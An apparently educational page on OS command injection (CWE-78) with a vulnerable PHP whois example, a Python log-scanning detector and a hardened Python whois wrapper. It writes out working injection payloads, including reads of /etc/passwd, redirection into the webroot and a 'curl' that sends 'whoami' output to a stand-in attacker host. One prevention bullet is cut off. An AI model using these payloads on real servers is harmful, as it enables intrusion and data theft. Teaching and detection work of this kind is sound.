# OS Command Injection (CWE-78)

## Overview

### Description

OS Command Injection is a vulnerability that allows an attacker to execute operating-system commands on a vulnerable server.

This vulnerability occurs when a web application passes user input directly to the OS shell. Almost all programming languages, like C, C++, Java, Python, PHP and Perl, allow calling OS commands. The injected command runs with the privileges given to the web server (webroot) user, so the attacker can execute any command that user is allowed to run.
## Blind Command Injection

Sometimes the attacker cannot see the command output in the web page response, but the command is still executed. To detect such blind command injection, an attacker uses various techniques:

- Time delay: `ping -c 10 127.0.0.1 &`. If this command gets executed, the web page will load after 10 seconds, so the attacker can confirm the command injection.
- Output redirection: an attacker can redirect the output of a command to a text file in the webroot directory, e.g. `cat /etc/passwd > /var/www/default/html/temp.txt`. After the command executes, the attacker can read the output from the website at `http://site.com/temp.txt`.
- Sending output to an attacker-controlled server: `curl http://attacker.com/?op=$(whoami)`. This command sends an HTTP request to attacker.com with the GET parameter `op=` set to the output of the command. If the attacker doesn't have a website, they can use an introspectable tunnel to localhost like ngrok, which gives a temporary server `http://something.ngrok.io/` that redirects to localhost.
## Example

Let's consider a simple web application that takes a domain name as input and displays its Whois record.

```php
<?php
// Vulnerable: $domain comes straight from the query string and is
// interpolated, unescaped, into a command line that a shell parses.
$domain = $_GET['domain'];
$output = shell_exec("whois $domain");
echo "<pre>$output</pre>";
?>
```

Let's give the domain as `iitgoa.ac.in`. At the backend server it will execute the command `whois iitgoa.ac.in`, which gives output as follows.

Request: `https://site.com/?domain=iitgoa.ac.in`

```
...
Domain Name: iitgoa.ac.in
Registry Domain ID: D414400000001284698-IN
Registrar WHOIS Server:
Registrar URL: http://www.ernet.in
Updated Date: 2017-07-18T11:53:18Z
Creation Date: 2016-07-05T10:51:55Z
Registry Expiry Date: 2026-07-05T10:51:55Z
Registrar: ERNET India
Tech Email: Please contact the Registrar listed above
Name Server: dns1.iitgoa.ac.in
Name Server: dns2.iitgoa.ac.in
...
```

Now the attacker can inject another command as:

`https://site.com/?domain=iitgoa.ac.in%26cat /etc/passwd`

Here `%26` is the URL encoding of `&`, so at the backend server it will execute the command `whois iitgoa.ac.in & cat /etc/passwd`, and this will print the whois information as well as the passwd file.
- There are a few command separators used to inject commands, like `&`, `&&`, `|`, `||`, `;`, etc.
- These are OS specific.
- Generally, these separators are blacklisted, so the attacker has to bypass the filters.
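The blind-injection techniques and the separator list above also describe what a defender can look for in web server logs. As an added example that is not part of the original page, the following Python script URL-decodes each request's query parameters and flags values containing shell separators or the page's blind-injection patterns (time delay, output redirection into the webroot, out-of-band `curl ... $(...)`). The log lines, parameter names and the access-log layout are constructed for this example.

```python
"""Log triage for command-injection attempts (added example, not page code).
The access-log lines below are constructed sample data, not real traffic."""
import re
from urllib.parse import urlsplit, unquote_plus

# Shell metacharacters that chain or substitute commands (POSIX sh; cmd.exe
# shares & | && || ). A newline (%0a when encoded) also ends a command.
SEPARATOR_RE = re.compile(r"(&&|\|\||[&|;`\n]|\$\()")

# Indicators of the blind techniques described on the page.
BLIND_PATTERNS = {
    "time-delay": re.compile(r"\b(ping\s+-[cn]\s*\d+|sleep\s+\d+)\b"),
    "output-redirect": re.compile(r">\s*/var/www/"),
    "out-of-band": re.compile(r"\b(curl|wget|nslookup)\s+\S*\$\("),
}

# Apache/nginx "combined"-style lines: ip ident user [time] "METHOD target PROTO" status bytes
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Constructed sample log. Separators are percent-encoded in the URL, which is
# why decoding before matching matters (%26 = &, %7C = |, %3E = >).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?domain=iitgoa.ac.in HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /?domain=iitgoa.ac.in%26cat%20/etc/passwd HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?domain=example.com;ping%20-c%2010%20127.0.0.1 HTTP/1.1" 200 512
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /?domain=a%26cat%20/etc/passwd%20%3E%20/var/www/default/html/temp.txt HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?domain=x%7Ccurl%20http://attacker.com/?op=$(whoami) HTTP/1.1" 200 10
10.0.0.10 - - [01/Jan/2024:10:00:06 +0000] "GET /?q=fish%20%26%20chips HTTP/1.1" 200 300
"""


def query_params(target):
    """Yield decoded (name, value) pairs. Splitting on the raw '&' first and
    decoding afterwards is deliberate: an encoded %26 must stay inside the
    value, exactly as the vulnerable application would see it."""
    query = urlsplit(target).query
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def scan_request(line):
    """Return (ip, findings) for one log line, or None if the line does not parse.
    findings is a list of 'label:parameter' strings, empty for a clean request."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    findings = []
    for name, value in query_params(match.group("target")):
        if SEPARATOR_RE.search(value):
            findings.append(f"separator:{name}")
        for label, pattern in BLIND_PATTERNS.items():
            if pattern.search(value):
                findings.append(f"{label}:{name}")
    return match.group("ip"), findings


def scan_log(text):
    """Map each source IP to its findings, skipping clean or unparsable lines."""
    hits = {}
    for line in text.splitlines():
        result = scan_request(line)
        if result and result[1]:
            hits[result[0]] = result[1]
    return hits


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(findings))
```

The last sample line (`fish & chips`) is flagged on the separator alone, which is the expected noise of a metacharacter heuristic: it is a triage filter for deciding which requests to inspect, not proof of an attack. The requests that also match a blind-injection pattern are the ones worth pulling the application logs for first.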
## Impact

- The full system will get compromised.
- An attacker can access all the server data, which may contain sensitive business and customer data.
- An attacker can use your server to launch DDoS attacks on other servers.
- An attacker can create a backdoor so that they can connect to the server even after this vulnerability is patched.
## Prevention

- Never trust user input; avoid passing user input to the OS shell.
- Filter user input based on a whitelist.
- Accept only alphanumeric user input, and reject it if it contains any symbol or whitespace.
- b
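To show the prevention advice applied to the page's whois lookup, here is an added example in Python (not the page's PHP and not any project's code). It puts the vulnerable shape (user input pasted into a shell string) beside the hardened one: a whitelist that accepts only a plain host name, and execution through an argument list so no shell ever parses the value. Function names and the regex are this example's own.

```python
"""Whois lookup hardened against command injection (added example)."""
import re
import shlex
import subprocess

# Whitelist for a DNS host name: labels of 1-63 letters, digits or hyphens,
# no label starting or ending with a hyphen, at least two labels, 253 chars max.
# Shell separators, spaces, quotes, $( ) and a leading option dash all fail it.
LABEL = r"(?!-)[a-z0-9-]{1,63}(?<!-)"
DOMAIN_RE = re.compile(rf"^(?=.{{1,253}}$){LABEL}(?:\.{LABEL})+$")


def validate_domain(raw: str) -> str:
    """Return the normalised domain, or raise ValueError if it is not a plain host name."""
    domain = raw.strip().lower()
    if not DOMAIN_RE.match(domain):
        raise ValueError(f"rejected input: {raw!r}")
    return domain


def vulnerable_command(raw: str) -> str:
    """The shape of the page's PHP: input concatenated into a shell command line.
    Returned rather than executed so the problem stays visible: once a shell
    parses 'whois a.com & cat /etc/passwd' it runs two commands."""
    return f"whois {raw}"


def whois_argv(raw: str) -> list:
    """Hardened form: validate first, then build an argv list. Passed to
    subprocess without a shell, the domain is a single argument and the
    characters &, ;, |, $( ) have no special meaning. The whitelist also
    forbids a leading '-', so the value cannot be parsed as a whois option."""
    return ["whois", validate_domain(raw)]


def run_whois(raw: str, timeout: float = 10.0) -> str:
    """Execute the lookup with no shell (shell=False is the default) and return stdout."""
    result = subprocess.run(
        whois_argv(raw), capture_output=True, text=True, timeout=timeout, check=False
    )
    return result.stdout


def quoted_fallback(raw: str) -> str:
    """If a shell is unavoidable (e.g. a pipeline), still validate, then quote.
    shlex.quote is the Python counterpart of PHP's escapeshellarg()."""
    return "whois " + shlex.quote(validate_domain(raw))


if __name__ == "__main__":
    for candidate in ["iitgoa.ac.in", "iitgoa.ac.in&cat /etc/passwd", "-h"]:
        try:
            print("accepted:", whois_argv(candidate))
        except ValueError as exc:
            print("blocked:", exc)
```

The order matters: validation happens before any command is built, so the shell-free `argv` and the quoted fallback both only ever see a value that already passed the whitelist. Quoting alone (escapeshellarg, shlex.quote) stops separator injection but not option injection, which is why the whitelist rejects values beginning with a hyphen.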
## Tools

- Commix: an automated all-in-one OS command injection and exploitation tool.